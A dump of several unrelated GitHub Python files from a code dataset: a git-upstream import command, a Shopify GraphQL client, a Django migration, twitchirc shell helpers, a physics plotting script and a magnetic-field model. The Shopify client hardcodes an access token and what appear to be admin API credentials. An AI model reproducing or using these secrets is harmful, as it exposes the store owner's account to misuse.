heads=True)\n\n except GitCommandError as e:\n msg = \"Invalid commit '%s' specified to import from\"\n self.log.error(msg, commit)\n raise ImportUpstreamError((msg + \": %s\"), commit, e)\n\n if not import_branch:\n import_branch = self.import_branch\n\n # use describe in order to be certain about unique identifying 'commit'\n # Create a describe string with the following format:\n # [-]*\n #\n # Simply appends the 7 character ref abbreviation for each extra branch\n # prefixed with '-', for each extra branch in the order they are given.\n describe_commit = self.git.describe(commit, tags=True,\n with_exceptions=False)\n if not describe_commit:\n self.log.warning(\"No tag describes the upstream branch\")\n describe_commit = self.git.describe(commit, always=True, tags=True)\n\n self.log.info(\"\"\"\\\n Using '%s' to describe:\n %s\n \"\"\", describe_commit, commit)\n describe_branches = [describe_commit]\n\n describe_branches.extend([self.git.rev_parse(b, short=True)\n for b in self.extra_branches])\n import_describe = \"-\".join(describe_branches)\n self._import_branch = self.import_branch.format(\n describe=import_describe)\n\n self._import_branch = import_branch.format(describe=import_describe)\n base = self._import_branch + \"-base\"\n self.log.debug(\"Creating and switching to import branch base '%s' \"\n \"created from '%s' (%s)\", base, self.upstream, commit)\n\n self.log.info(\n \"\"\"\\\n Checking if import branch '%s' 
already exists:\n git branch --list %s\n \"\"\", base, base)\n if self.git.show_ref(\"refs/heads/\" + base, verify=True,\n with_exceptions=False) and not force:\n msg = \"Import branch '%s' already exists, set 'force' to replace\"\n self.log.error(msg, self.import_branch)\n raise ImportUpstreamError(msg % self.import_branch)\n\n self._set_branch(base, commit, checkout, force)\n\n if self.extra_branches:\n self.log.info(\n \"\"\"\\\n Merging additional branch(es) '%s' into import branch '%s'\n git checkout %s\n git merge %s\n \"\"\", \", \".join(self.extra_branches), base, base,\n \" \".join(self.extra_branches))\n self.git.checkout(base)\n self.git.merge(*self.extra_branches)\n\n def _linearise(self, branch, sequence, previous_import):\n\n counter = len(sequence) - 1\n ancestors = set()\n\n self._set_branch(branch, previous_import, checkout=True, force=True)\n root = previous_import.hexsha\n while counter > 0:\n # add commit to list of ancestors to check\n ancestors.add(root)\n\n # look for merge commits that are not part of ancestry path\n for idx in xrange(counter - 1, -1, -1):\n commit = sequence[idx]\n # if there is only one parent, no need to check the others\n if len(commit.parents) < 2:\n ancestors.add(commit.hexsha)\n elif any(p.hexsha not in ancestors for p in commit.parents):\n self.log.debug(\"Rebase upto commit SHA1: %s\",\n commit.hexsha)\n idx = idx + 1\n break\n else:\n ancestors.add(commit.hexsha)\n tip = sequence[idx].hexsha\n\n self.log.info(\"Rebasing from %s to %s\", root, tip)\n previous = self.git.rev_parse(branch)\n self.log.info(\"Rebasing onto '%s'\", previous)\n if root == previous and idx == 0:\n # special case, we are already linear\n self.log.info(\"Already in a linear layout\")\n return\n self._set_branch(branch, tip, force=True)\n try:\n self.log.debug(\n \"\"\"\\\n git rebase -p --onto=%s \\\\\n %s %s\n \"\"\", previous, root, branch)\n self.git.rebase(root, branch, onto=previous, p=True)\n except:\n self.git.rebase(abort=True, with_exceptions=False)\n raise\n counter = idx - 1\n # set root commit for next loop\n root = sequence[counter].hexsha\n\n def apply(self, strategy, interactive=False):\n \"\"\"Apply list of commits given onto latest import of upstream\"\"\"\n\n commit_list = list(strategy.filtered_iter())\n if len(commit_list) == 0:\n self.log.notice(\"There are no local changes to be applied!\")\n return False\n\n self.log.debug(\n \"\"\"\\\n Should apply the following list of commits\n %s\n \"\"\", \"\\n \".join([c.hexsha for c in commit_list]))\n\n base = self.import_branch + \"-base\"\n\n self._set_branch(self.import_branch, self.branch, force=True)\n self.log.info(\n \"\"\"\\\n Creating import branch '%s' from specified commit '%s' in prep to\n linearize the local changes before transposing to the new upstream:\n git branch --force %s %s\n \"\"\", self.import_branch, self.branch, self.import_branch,\n self.branch)\n\n self.log.notice(\"Attempting to linearise previous changes\")\n # attempt to silently linearize the current carried changes as a branch\n # based on the previous located import commit. 
This provides a sane\n # abort result for if the user needs to abort the rebase of this branch\n # onto the new point upstream that was requested to import from.\n try:\n self._linearise(self.import_branch, strategy,\n strategy.searcher.commit)\n except:\n # Could ask user if they want to try and use the non clean route\n # provided they don't mind that 'git rebase --abort' will result\n # in a virtually useless local import branch\n self.log.warning(\n \"\"\"\\\n\n Exception occurred during linearisation of local changes on to\n previous import to simplify behaviour should user need to abort\n the rebase that applies these changes to the latest import\n point. Attempting to tidy up state.\n\n Do not Ctrl+C unless you wish to need to clean up your git\n repository by hand.\n\n \"\"\")\n # reset head back to the tip of the changes to be rebased\n self._set_branch(self.import_branch, self.branch, force=True)\n\n rebase = RebaseEditor(interactive, repo=self.repo)\n if len(commit_list):\n first = commit_list[0]\n\n self.log.info(\n \"\"\"\\\n Rebase changes, dropping merges through editor:\n git rebase --onto %s \\\\\n %s %s\n \"\"\", base, first.parents[0].hexsha, self.import_branch)\n status, out, err = rebase.run(commit_list,\n first.parents[0].hexsha,\n self.import_branch,\n onto=base)\n if status:\n if err and err.startswith(\"Nothing to do\"):\n # cancelled by user\n self.log.notice(\"Cancelled by user\")\n return False\n\n self.log.error(\"Rebase failed, will need user intervention to \"\n \"resolve.\")\n if out:\n self.log.notice(out)\n if err:\n self.log.notice(err)\n\n # once we support resuming/finishing add a message here to tell\n # the user to rerun this tool with the appropriate options to\n # complete\n return False\n\n self.log.notice(\"Successfully applied all locally carried changes\")\n else:\n self.log.warning(\"Warning, nothing to do: locally carried \" +\n \"changes already rebased onto \" + self.upstream)\n return True\n\n def resume(self, args):\n \"\"\"Resume previous partial import\"\"\"\n raise NotImplementedError\n\n def finish(self):\n \"\"\"\n Finish merge according to the selected strategy while performing\n suitable verification checks.\n \"\"\"\n self.log.info(\"No verification checks enabled\")\n self.git.checkout(self.branch)\n current_sha = self.git.rev_parse(\"HEAD\")\n\n try:\n self.log.info(\n \"\"\"\\\n Merging by inverting the 'ours' strategy discard all changes\n and replace existing branch contents with the new import.\n \"\"\")\n self.log.info(\n \"\"\"\\\n Merging import branch to HEAD and ignoring changes:\n git merge -s ours --no-commit %s\n \"\"\", self.import_branch)\n self.git.merge('-s', 'ours', self.import_branch, no_commit=True)\n self.log.info(\n \"\"\"\\\n Replacing tree contents with those from the import branch:\n git read-tree %s\n \"\"\", self.import_branch)\n self.git.read_tree(self.import_branch)\n self.log.info(\n \"\"\"\\\n Committing merge commit:\n git commit --no-edit\n \"\"\")\n self.git.commit(no_edit=True)\n self.log.info(\n \"\"\"\\\n Checking out updated index:\n git checkout -- .\n \"\"\")\n self.git.checkout(\"--\", \".\")\n # finally test that everything worked correctly by comparing if\n # the tree object id's match\n if self.git.rev_parse(\"HEAD^{tree}\") != \\\n self.git.rev_parse(\"%s^{tree}\" % self.import_branch):\n raise ImportUpstreamError(\n \"Resulting tree does not match import\")\n except (GitCommandError, ImportUpstreamError):\n self.log.error(\n \"\"\"\\\n Failed to finish import by merging branch:\n 
'%s'\n into and replacing the contents of:\n '%s'\n \"\"\", self.import_branch, self.branch)\n self._set_branch(self.branch, current_sha, force=True)\n return False\n except:\n self.log.exception(\"Unknown exception during finish\")\n self._set_branch(self.branch, current_sha, force=True)\n raise\n return True\n\n\nclass ImportStrategiesFactory(object):\n __strategies = None\n\n @classmethod\n def create_strategy(cls, type, *args, **kwargs):\n if type in cls.list_strategies():\n return cls.__strategies[type](*args, **kwargs)\n else:\n raise RuntimeError(\"No class implements the requested strategy: \"\n \"{0}\".format(type))\n\n @classmethod\n def list_strategies(cls):\n cls.__strategies = {\n subclass._strategy: subclass\n for subclass in LocateChangesStrategy.__subclasses__()\n if subclass._strategy}\n return cls.__strategies.keys()\n\n\nfrom git_upstream.lib.searchers import (NoMergeCommitFilter,\n ReverseCommitFilter,\n DiscardDuplicateGerritChangeId,\n SupersededCommitFilter,\n DroppedCommitFilter)\n\n\nclass LocateChangesStrategy(GitMixin, Sequence):\n \"\"\"\n Base class that needs to be extended with the specific strategy on how to\n handle changes locally that are not yet upstream.\n \"\"\"\n __metaclass__ = ABCMeta\n\n @abstractmethod\n def __init__(self, git=None, *args, **kwargs):\n \"\"\"\n Initialize an empty filters list\n \"\"\"\n self.data = None\n self.filters = []\n super(LocateChangesStrategy, self).__init__(*args, **kwargs)\n\n def __getitem__(self, key):\n if not self.data:\n self.data = self._popdata()\n return self.data[key]\n\n def __len__(self):\n if not self.data:\n self.data = self._popdata()\n return len(self.data)\n\n @classmethod\n def get_strategy_name(cls):\n return cls._strategy\n\n def filtered_iter(self):\n # chain the filters as generators so that we don't need to allocate new\n # lists for each step in the filter chain.\n commit_list = self\n for f in self.filters:\n commit_list = f.filter(commit_list)\n\n return commit_list\n\n def filtered_list(self):\n\n return list(self.filtered_iter())\n\n def _popdata(self):\n \"\"\"\n Should return the list of commits from the searcher object\n \"\"\"\n return self.searcher.list()\n\n\nclass LocateChangesWalk(LocateChangesStrategy):\n \"\"\"\n \"\"\"\n\n _strategy = \"drop\"\n\n def __init__(self, branch=\"HEAD\", search_ref=None, *args, **kwargs):\n self.searcher = UpstreamMergeBaseSearcher(branch=branch,\n pattern=search_ref)\n self.search_ref = search_ref\n super(LocateChangesWalk, self).__init__(*args, **kwargs)\n\n def filtered_iter(self):\n # may wish to make class used to remove duplicate objects configurable\n # through git-upstream specific 'git config' settings\n if self.search_ref:\n self.filters.append(\n DiscardDuplicateGerritChangeId(self.search_ref,\n limit=self.searcher.commit))\n self.filters.append(NoMergeCommitFilter())\n self.filters.append(ReverseCommitFilter())\n self.filters.append(DroppedCommitFilter())\n self.filters.append(\n SupersededCommitFilter(self.search_ref,\n limit=self.searcher.commit))\n\n return super(LocateChangesWalk, self).filtered_iter()\n\n\n@subcommand.arg('-d', '--dry-run', dest='dry_run', action='store_true',\n default=False,\n help='Only print out the list of commits that would be '\n 'applied.')\n@subcommand.arg('-i', '--interactive', action='store_true', default=False,\n help='Let the user edit the list of commits before applying.')\n@subcommand.arg('-f', '--force', dest='force', required=False,\n action='store_true', default=False,\n help='Force overwrite of 
existing import branch if it exists.')\n@subcommand.arg('--merge', dest='merge', required=False, action='store_true',\n default=True,\n help='Merge the resulting import branch into the target branch'\n ' once complete')\n@subcommand.arg('--no-merge', dest='merge', required=False,\n action='store_false',\n help=\"Disable merge of the resulting import branch\")\n@subcommand.arg('-s', '--strategy', metavar='',\n choices=ImportStrategiesFactory.list_strategies(),\n default=LocateChangesWalk.get_strategy_name(),\n help='Use the given strategy to re-apply locally carried '\n 'changes to the import branch. (default: %(default)s)')\n@subcommand.arg('--into', dest='branch', metavar='', default='HEAD',\n help='Branch to take changes from, and replace with imported '\n 'branch.')\n@subcommand.arg('--import-branch', metavar='',\n help='Name of import branch to use',\n default='import/{describe}')\n@subcommand.arg('upstream_branch', metavar='', nargs='?',\n default='upstream/master',\n help='Upstream branch to import. Must be specified if '\n 'you wish to provide additional branches.')\n@subcommand.arg('branches', metavar='', nargs='*',\n help='Branches to additionally merge into the import branch '\n 'using default git merging behaviour')\ndef do_import(args):\n \"\"\"\n Import code from specified upstream branch.\n\n Creates an import branch from the specified upstream branch, and optionally\n merges additional branches given as arguments. Current branch, unless\n overridden by the --into option, is used as the target branch from which a\n list of changes to apply onto the new import is constructed based on the\n the specified strategy.\n\n Once complete it will merge and replace the contents of the target branch\n with those from the import branch, unless --no-merge is specified.\n \"\"\"\n\n logger = log.get_logger('%s.%s' % (__name__,\n inspect.stack()[0][0].f_code.co_name))\n\n import_upstream = ImportUpstream(branch=args.branch,\n upstream=args.upstream_branch,\n import_branch=args.import_branch,\n extra_branches=args.branches)\n\n logger.notice(\"Searching for previous import\")\n strategy = ImportStrategiesFactory.create_strategy(\n args.strategy, branch=args.branch, search_ref=args.upstream_branch)\n\n if len(strategy) == 0:\n raise ImportUpstreamError(\"Cannot find previous import\")\n\n # if last commit in the strategy was a merge, then the additional branches\n # that were merged in previously can be extracted based on the commits\n # merged.\n prev_import_merge = strategy[-1]\n if len(prev_import_merge.parents) > 1:\n idx = next((idx for idx, commit in enumerate(prev_import_merge.parents)\n if commit.hexsha == strategy.searcher.commit.hexsha), None)\n\n if idx:\n additional_commits = prev_import_merge.parents[idx + 1:]\n if additional_commits and not args.branches:\n logger.warning(\"\"\"\\\n **************** WARNING ****************\n Previous import merged additional branches but non have\n been specified on the command line for this import.\\n\"\"\")\n\n if args.dry_run:\n commit_list = [c.hexsha[:6] + \" - \" + c.summary[:60] +\n (c.summary[60:] and \"...\")\n for c in list(strategy.filtered_iter())]\n logger.notice(\"\"\"\\\n Requested a dry-run: printing the list of commit that should be\n rebased\n\n %s\n \"\"\", \"\\n \".join(commit_list))\n return True\n\n logger.notice(\"Starting import of upstream\")\n import_upstream.create_import(force=args.force)\n logger.notice(\"Successfully created import branch\")\n\n if not import_upstream.apply(strategy, args.interactive):\n 
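A standalone illustration (not from the repo) of the (c.summary[60:] and "...") idiom in the dry-run branch above: "and" returns its falsy left operand unchanged, so the ellipsis is appended only when the summary was actually truncated:

for s in ("short", "x" * 70):
    # s[60:] is "" (falsy) for short strings, so "" and "..." evaluates to "";
    # for long strings the slice is truthy and "..." is appended.
    print(s[:60] + (s[60:] and "..."))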
logger.notice(\"Import cancelled\")\n return False\n\n if not args.merge:\n logger.notice(\n \"\"\"\\\n Import complete, not merging to target branch '%s' as requested.\n \"\"\", args.branch)\n return True\n\n logger.notice(\"Merging import to requested branch '%s'\", args.branch)\n if import_upstream.finish():\n logger.notice(\n \"\"\"\\\n Successfully finished import:\n target branch: '%s'\n upstream branch: '%s'\n import branch: '%s'\"\"\", args.branch, args.upstream_branch,\n import_upstream.import_branch)\n if args.branches:\n for branch in args.branches:\n logger.notice(\" extra branch: '%s'\", branch, dedent=False)\n\n\n# vim:sw=4:sts=4:ts=4:et:\n","repo_name":"dguerri/git-upstream-old","sub_path":"git_upstream/commands/import.py","file_name":"import.py","file_ext":"py","file_size_in_byte":24719,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72008624168","text":"import requests\n\nBASE_URL = 'https://axelteststore.myshopify.com'\n\n\nclass GraphQL:\n \"\"\"An interface for GraphQL endpoints.\"\"\"\n\n @staticmethod\n def request(query):\n \"\"\"Make a GraphQL request to the Shopify API.\n\n Args:\n query (str): The GraphQL request data.\n\n Returns:\n Response: The GraphQL response.\n \"\"\"\n return requests.post(\n BASE_URL + '/api/graphql',\n data=query,\n headers={\n 'Content-Type':\n 'application/graphql',\n 'X-Shopify-Storefront-Access-Token':\n '98b4b577fbc417686bc9354af95c735b'\n }).json()\n\n @staticmethod\n def get_products():\n \"\"\"Get all the products.\n\n Returns:\n Response: The GraphQL response.\n \"\"\"\n products = {}\n all_products = requests.get(\n BASE_URL + '/admin/products.json',\n auth=('e7759a3699a682d55e2c25991596e3cc',\n 'c586e1e6cf85d7a25e0df45ee8f66204')).json()\n for product in all_products[\"products\"]:\n products[product['handle']] = GraphQL.get_product(product['handle'])\n\n return products\n\n @staticmethod\n def get_product(product_name):\n \"\"\"Get a single product given a name.\n\n Args:\n product_name: (str): The name of the product.\n\n Returns:\n Response: The GraphQL response.\n \"\"\"\n query = '{shop {productByHandle(handle: \"' + product_name + '\") {id}}}'\n\n return GraphQL.request(query)\n\n @staticmethod\n def get_product_variants(product_name):\n \"\"\"Get the variants for a given product.\n\n Args:\n product_name: (str): The name of the product.\n\n Returns:\n Response: The GraphQL response.\n \"\"\"\n query = '{ shop { productByHandle(handle: \"' + product_name + '\")\\\n { variants(first:3) { edges { node { id }}}}}}'\n\n return GraphQL.request(query)\n\n @staticmethod\n def build_line_items(variants):\n \"\"\"Build the line items object for the product variants.\n\n Args:\n variants: (str): The variants of the product.\n\n Returns:\n str: The line items GraphQL string.\n \"\"\"\n variants = variants['data']['shop']['productByHandle']['variants'][\n 'edges']\n line_items = \"[\"\n for variant in variants:\n line_items += '{ variantId: \"' + variant['node']['id'] + '\", quantity: 1 }'\n\n return str(line_items + ']')\n\n @staticmethod\n def create_checkout(product_name):\n \"\"\"Crearte a checkout URL with the product added to the cart.\n\n Args:\n product_name: (str): The name of the product.\n\n Returns:\n str: The checkout URL.\n \"\"\"\n variants = GraphQL.get_product_variants(product_name)\n line_items = GraphQL.build_line_items(variants)\n query = (\n 'mutation {checkoutCreate(input: {lineItems: ' + line_items +\n '}){checkout {id webUrl lineItems(first: 5) 
{edges {node {title quantity}}}}}}'\n )\n request = GraphQL.request(query)\n checkout = request['data']['checkoutCreate']['checkout']['webUrl']\n\n return checkout\n","repo_name":"axelthorstein/object","sub_path":"object/graphql.py","file_name":"graphql.py","file_ext":"py","file_size_in_byte":3280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15911335246","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('weapon', '0001_initial'),\n ('card', '0007_auto_20151014_1310'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='cardeptitude',\n name='weapon',\n field=models.ForeignKey(to='weapon.Weapon', blank=True, null=True),\n preserve_default=True,\n ),\n ]\n","repo_name":"officefish/la_server","sub_path":"card/migrations/0008_cardeptitude_weapon.py","file_name":"0008_cardeptitude_weapon.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34325797428","text":"import select\nimport typing\n\nimport twitchirc\n\n\ndef create_msg(text, channel) -> twitchirc.ChannelMessage:\n \"\"\"\n Create a ChannelMessage with the provided text and channel.\n\n :return: Newly created ChannelMessage object.\n \"\"\"\n msg = twitchirc.ChannelMessage(text=text, channel=channel, user='OUTGOING')\n msg.outgoing = True\n return msg\n\n\ndef connect(oauth_token, use_ssl=True) -> twitchirc.Connection:\n \"\"\"\n Connect to IRC.\n\n :param oauth_token: Authentication token. You can get one at https://twitchapps.com/tmi/\n The username is not needed for connecting.\n :param use_ssl: You can enable or disable encryption here.\n :return: created connection.\n \"\"\"\n conn = twitchirc.Connection('irc.chat.twitch.tv', port=6697 if use_ssl else 6667, secure=use_ssl)\n conn.connect('don_t_need_to_know_this', oauth_token)\n return conn\n\n\ndef connect_anon(use_ssl=True) -> twitchirc.Connection:\n \"\"\"\n Connect to IRC.\n\n :param use_ssl: You can enable or disable encryption here.\n :return: created connection.\n \"\"\"\n conn = twitchirc.Connection('irc.chat.twitch.tv', port=6697 if use_ssl else 6667, secure=use_ssl)\n conn.connect('justinfan1234', 'junstinfan1234')\n return conn\n\n\ndef recv(conn: twitchirc.Connection) -> typing.List[twitchirc.Message]:\n msgs = []\n while 1:\n ready, _, _ = select.select([conn.socket], [], [], 0)\n ready = bool(ready)\n if ready:\n conn.receive()\n m = conn.process_messages()\n if not m:\n break\n print(m)\n msgs.extend(m)\n\n return msgs\n\n\nprint(f'twitchirc shell shortcuts loaded. 
There are shortcuts here for making experimenting easier.')\nprint(' - create_msg(text: str, channel: str) -> Message \\n'\n ' Creates a ChannelMessage with the provided text and channel, useful for sending test messages.')\nprint(' - connect(oauth_token: str, use_ssl=True) -> Connection\\n'\n ' Connect.')\nprint(' - connect_anon(use_ssl=True) -> Connection\\n'\n ' Connect anonymously.')\nprint(' - recv(conn: Connection) -> List[Message]\\n'\n ' Receive and process all the messages waiting.')\nif __name__ == '__main__':\n try:\n import IPython\n\n IPython.start_ipython()\n except ImportError:\n import code\n\n code.interact(local=globals())\n","repo_name":"Mm2PL/twitchirc","sub_path":"twitchirc/twitchirc/shell.py","file_name":"shell.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12029807815","text":"import subprocess\nfrom subprocess import PIPE\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport csv\n\ngrains = 20\nsupport = 6\npopulation_num = 1e3\nk = 2\nl = 6\nepsilon = 1e-100 \ndisorder_start = 20\ndisorder_end = 30\naverage_type = \"mean\"\nstart_wait = int(2e3)\nnum_iterations = int(1e3)\nenergy = 0\n\ndisorder_vec = np.linspace(disorder_start,disorder_end,grains)\ntime_aver_vec = np.array([])\nprint(\"L = {}, K = {}\".format(l,k))\nfor disorder in disorder_vec:\n x = subprocess.run(\"~/anderson/husimi/time_aver.exe {} {} {} {} {} {} {} {} {} {}\".format(grains, support, population_num, k, l, epsilon, disorder, num_iterations, energy, start_wait),shell=True,stdout=PIPE).stdout.decode(\"utf-8\").split(\",\")[:-1]\n res_vec = np.array([float(i) for i in x])\n time_aver_vec = np.append(time_aver_vec, np.average(res_vec))\n print(\"Disorder = {}\".format(disorder))\n\nplt.plot(disorder_vec, time_aver_vec)\nplt.title(\"Time average after {} iterations over {} iterations against disorder for husimi L{},K{}\".format(start_wait, num_iterations,l,k))\nplt.xlabel(\"Disorder\")\nplt.ylabel(\"Time averaged mean imaginary part of resolvent\")\nplt.yscale('log')\nplt.savefig('time_aver_{}_P{}_L{}_K{}.png'.format(average_type, population_num, l, k), bbox_inches='tight')\n\nsubprocess.run(\"gsutil mv time_aver_{}_P{}_L{}_K{}.png gs://anderson_loc/husimi/mob_edge/\".format(average_type, population_num, l, k),shell=True)\n","repo_name":"Snillocada/anderson","sub_path":"husimi/mobtest.py","file_name":"mobtest.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20155369765","text":"import cobdh\nimport cobdh.xmlx.parser\n\nNS = {\n 'tei': 'http://www.tei-c.org/ns/1.0',\n}\nXMLID = '{http://www.w3.org/XML/1998/namespace}id'\n\n\ndef bibl_id(path):\n \"\"\"\\\n >>> import tests.resources\n >>> bibl_id(tests.resources.BIBL_1_PATH) # adjust test after changing data collection\n 'BVCP1990'\n >>> bibl_id(tests.resources.BIBL_10_PATH)\n 'Hovhanessian2013'\n \"\"\"\n content = cobdh.file_read(path)\n data = cobdh.xmlx.parser.parse(content)\n parsed = data.find('.//tei:biblFull', namespaces=NS)\n if not parsed:\n # backup parser\n parsed = data.find('.//tei:biblStruct', namespaces=NS)\n value = parsed.get(XMLID)\n return value\n\n\ndef persons_id(path):\n \"\"\"\\\n >>> import tests.resources\n >>> persons_id(tests.resources.PERSONS_2_PATH) # adjust test after changing data collection\n 'HovhanessianVahan'\n \"\"\"\n content = cobdh.file_read(path)\n data = cobdh.xmlx.parser.parse(content)\n 
parsed = data.find('.//tei:person', namespaces=NS)\n value = parsed.get(XMLID)\n return value\n","repo_name":"cobdh/app","sub_path":"tests/resources/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42854638758","text":"import numpy as np\nimport math\nfrom numpy import linalg as la\nfrom numba import njit\n\ndef Hr_3D(j,mi_0,imas,dom): # Campo H na direção X para 1 ímã\n CTE = j/(4*np.pi*mi_0)\n Sum_x = 0.0\n Sum_y = 0.0\n Sum_z = 0.0\n L_x = dom[0][0]\n L_y = dom[0][1]\n L_z = dom[0][2]\n n_x = int(dom[1][0])\n n_y = int(dom[1][1])\n n_z = int(dom[1][2])\n delta_x = L_x/(n_x-1)\n delta_y = L_y/(n_y-1)\n delta_z = L_z/(n_z-1)\n x_0 = - delta_x\n y_0 = - delta_y\n z_0 = - delta_z\n\n H = []\n for i in range(n_z):\n z_0 = z_0 + delta_z\n for j in range(n_y):\n y_0 = y_0 + delta_y\n for k in range(n_x):\n x_0 = x_0 + delta_x\n for l in range(len(imas)):\n a = imas[l][0]\n b = imas[l][1]\n c = imas[l][2]\n x = -imas[l][3] + x_0\n y = -imas[l][4] + y_0\n z = -imas[l][5] + z_0\n H_x = CTE*np.log(((y+b+np.sqrt((y+b)**2+(x-a)**2+z**2))/\\\n (y-b+np.sqrt((y-b)**2+(x-a)**2+z**2)))\\\n *((y-b+np.sqrt((y-b)**2+(x+a)**2+z**2))\\\n /(y+b+np.sqrt((y+b)**2+(x+a)**2+z**2))))\\\n -CTE*np.log(((y+b+np.sqrt((y+b)**2+(x-a)**2+(z+c)**2))/\\\n (y-b+np.sqrt((y-b)**2+(x-a)**2+(z+c)**2)))\\\n *((y-b+np.sqrt((y-b)**2+(x+a)**2+(z+c)**2))\\\n /(y+b+np.sqrt((y+b)**2+(x+a)**2+(z+c)**2))))\n \n H_y = CTE*np.log(((x+a+np.sqrt((y-b)**2+(x+a)**2+z**2))/\\\n (x-a+np.sqrt((y-b)**2+(x-a)**2+z**2)))\\\n *((x-a+np.sqrt((y+b)**2+(x-a)**2+z**2))\\\n /(x+a+np.sqrt((y+b)**2+(x+a)**2+z**2))))\\\n -CTE*np.log(((x+a+np.sqrt((y-b)**2+(x+a)**2+(z+c)**2))/\\\n (x-a+np.sqrt((y-b)**2+(x-a)**2+(z+c)**2)))\\\n *((x-a+np.sqrt((y+b)**2+(x-a)**2+(z+c)**2))\\\n /(x+a+np.sqrt((y+b)**2+(x+a)**2+(z+c)**2))))\n \n H_z = CTE*(np.arctan(((x+a)*(y+b))/(z*np.sqrt((x+a)**2+(y+b)**2+z**2)))\\\n +np.arctan(((x-a)*(y-b))/(z*np.sqrt((x-a)**2+(y-b)**2+z**2)))\\\n -np.arctan(((x+a)*(y-b))/(z*np.sqrt((x+a)**2+(y-b)**2+z**2)))\\\n -np.arctan(((x-a)*(y+b))/(z*np.sqrt((x-a)**2+(y+b)**2+z**2))))\\\n -CTE*(np.arctan(((x+a)*(y+b))/((z+c)*np.sqrt((x+a)**2+(y+b)**2+(z+c)**2)))\\\n +np.arctan(((x-a)*(y-b))/((z+c)*np.sqrt((x-a)**2+(y-b)**2+(z+c)**2)))\\\n -np.arctan(((x+a)*(y-b))/((z+c)*np.sqrt((x+a)**2+(y-b)**2+(z+c)**2)))\\\n -np.arctan(((x-a)*(y+b))/((z+c)*np.sqrt((x-a)**2+(y+b)**2+(z+c)**2))))\n \n Sum_x = Sum_x + H_x\n Sum_y = Sum_y + H_y\n Sum_z = Sum_z + H_z \n res = ((Sum_x)**2+(Sum_y)**2+(Sum_z)**2)**(0.5)\n Sum = np.array(([res,Sum_x,Sum_y,Sum_z,x_0,y_0,z_0]))\n H.append(Sum)\n Sum_x = 0.0\n Sum_y = 0.0\n Sum_z = 0.0 \n x_0 = 0.0\n y_0 = 0.0\n\n return H\n\ndef Hr_1D(j,mi_0,imas,dom): # Campo H na direção X para 1 ímã\n CTE = j/(4*np.pi*mi_0)\n Sum_x = 0.0\n Sum_y = 0.0\n Sum_z = 0.0\n L_z = dom[0][2]\n n_z = int(dom[1][2])\n delta_z = L_z/(n_z-1)\n z_0 = - delta_z\n\n H = []\n for i in range(n_z):\n z_0 = z_0 + delta_z\n for l in range(len(imas)):\n a = imas[l][0]\n b = imas[l][1]\n c = imas[l][2]\n x = -imas[0][3] \n y = -imas[0][4] \n z = -imas[l][5] + z_0\n H_x = CTE*np.log(((y+b+np.sqrt((y+b)**2+(x-a)**2+z**2))/\\\n (y-b+np.sqrt((y-b)**2+(x-a)**2+z**2)))\\\n *((y-b+np.sqrt((y-b)**2+(x+a)**2+z**2))\\\n /(y+b+np.sqrt((y+b)**2+(x+a)**2+z**2))))\\\n -CTE*np.log(((y+b+np.sqrt((y+b)**2+(x-a)**2+(z+c)**2))/\\\n (y-b+np.sqrt((y-b)**2+(x-a)**2+(z+c)**2)))\\\n *((y-b+np.sqrt((y-b)**2+(x+a)**2+(z+c)**2))\\\n 
/(y+b+np.sqrt((y+b)**2+(x+a)**2+(z+c)**2))))\n \n H_y = CTE*np.log(((x+a+np.sqrt((y-b)**2+(x+a)**2+z**2))/\\\n (x-a+np.sqrt((y-b)**2+(x-a)**2+z**2)))\\\n *((x-a+np.sqrt((y+b)**2+(x-a)**2+z**2))\\\n /(x+a+np.sqrt((y+b)**2+(x+a)**2+z**2))))\\\n -CTE*np.log(((x+a+np.sqrt((y-b)**2+(x+a)**2+(z+c)**2))/\\\n (x-a+np.sqrt((y-b)**2+(x-a)**2+(z+c)**2)))\\\n *((x-a+np.sqrt((y+b)**2+(x-a)**2+(z+c)**2))\\\n /(x+a+np.sqrt((y+b)**2+(x+a)**2+(z+c)**2))))\n \n H_z = CTE*(np.arctan(((x+a)*(y+b))/(z*np.sqrt((x+a)**2+(y+b)**2+z**2)))\\\n +np.arctan(((x-a)*(y-b))/(z*np.sqrt((x-a)**2+(y-b)**2+z**2)))\\\n -np.arctan(((x+a)*(y-b))/(z*np.sqrt((x+a)**2+(y-b)**2+z**2)))\\\n -np.arctan(((x-a)*(y+b))/(z*np.sqrt((x-a)**2+(y+b)**2+z**2))))\\\n -CTE*(np.arctan(((x+a)*(y+b))/((z+c)*np.sqrt((x+a)**2+(y+b)**2+(z+c)**2)))\\\n +np.arctan(((x-a)*(y-b))/((z+c)*np.sqrt((x-a)**2+(y-b)**2+(z+c)**2)))\\\n -np.arctan(((x+a)*(y-b))/((z+c)*np.sqrt((x+a)**2+(y-b)**2+(z+c)**2)))\\\n -np.arctan(((x-a)*(y+b))/((z+c)*np.sqrt((x-a)**2+(y+b)**2+(z+c)**2))))\n \n Sum_x = Sum_x + H_x\n Sum_y = Sum_y + H_y\n Sum_z = Sum_z + H_z \n res = ((Sum_x)**2+(Sum_y)**2+(Sum_z)**2)**(0.5)\n Sum = np.array(([res,Sum_x,Sum_y,Sum_z,x,y,z_0]))\n H.append(Sum)\n Sum_x = 0.0\n Sum_y = 0.0\n Sum_z = 0.0 \n\n\n return H\n\ndef temp_1d(t1,t2,pf,x,n,l_x):\n t = np.zeros(n)\n for i in range(n):\n if pf==1:\n t[i] = t1 +((t2-t1)/l_x)*x[i]\n if pf==2 and t2 == 400:\n t[i] = t1 + (3012*x[i]) -(2594*(x[i]**2)) + (873961*(x[i]**3)) 